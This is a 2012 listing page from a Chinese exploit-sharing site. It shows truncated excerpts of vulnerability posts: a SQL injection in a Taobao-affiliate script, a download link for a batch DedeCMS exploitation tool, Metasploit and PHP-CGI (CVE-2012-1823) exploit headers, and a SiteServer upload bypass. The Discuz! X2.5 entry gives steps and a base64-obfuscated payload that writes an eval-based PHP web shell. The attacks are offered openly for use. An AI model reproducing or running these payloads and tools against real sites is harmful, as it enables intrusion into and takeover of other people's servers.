漏洞时代

因为改版,丢失了大量的友情..本站的文章都大多源自网络.并不是都是原创。如果没有著名出处。可能是转载文章的时候没有写或者是文章本身就是转载的就没在写出处。本站定位就是分享资源。如果有版权问题,请联系本站删除或者更改!!!需要交换链接的朋友请到关于我们留言~~

多多淘宝客程序 V7.4 SQL注射绕过漏洞

问题位置:huangou.php ID过滤不严格$id =$_GET[''id'']; $good=sel_sql(‘dhlist’,''id,name,pic,money,jifen,num,content,num’,''id=’.$id);详细说明:7.4 3月20号之前的代码,注入确实没修,huangou.php$id =$_GET[''id'']; $good=sel_sql(‘...

没穿底裤 2012 年 05 月 06 日 暂无评论

dedecms5.7 批量检测工具发布

织梦CMS是集简单、健壮、灵活、开源几大特点的开源内容管理系统,是国内开源CMS的领先品牌,目前程序安装量已达七十万,超过六成的站点正在使用织梦CMS或基于织梦CMS...漏洞出来这么久,没见利用工具。 屌丝们,今天它来了。-     工具下载:http://dl.dbank.com/c0wgfeb6fc 

没穿底裤 2012 年 05 月 06 日 暂无评论

Solarwinds Storage Manager 5.1.0 SQL Injection

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensi...

没穿底裤 2012 年 05 月 06 日 暂无评论

Cve-2012-1823 PHP CGI Argument Injection Exploit

###################################################################################### # Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit # Date: May 4, 2012 # Author: rayh4c[0x40...

没穿底裤 2012 年 05 月 06 日 暂无评论

Discuz! X2.5 远程代码执行漏洞及EXP 0day

发布时间:2012-4.30 发布作者:佚名漏洞类型:代码执行漏洞描述: 1.注册任意账户2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKT...

没穿底裤 2012 年 05 月 06 日 暂无评论

siteserver cms 3.4.5鸡肋上传漏洞

发布时间:2012-5.01 发布作者:姗姗来迟漏洞类型:文件上传漏洞描述: 此漏洞跟原来的漏洞 手法非常相似!满足两个条件 系统开放注册 iis6注册账户->文档附件管理->上传文件 我们新建一层目录 当然 之前是可以建立*.asp 的目录 在3.4.5中已经过滤我们还是建立一层目录! 名字任意这个时候我们上传文件 结果发现 上传jpg gif 格式都不行,但是txt可以上传,...

没穿底裤 2012 年 05 月 06 日 暂无评论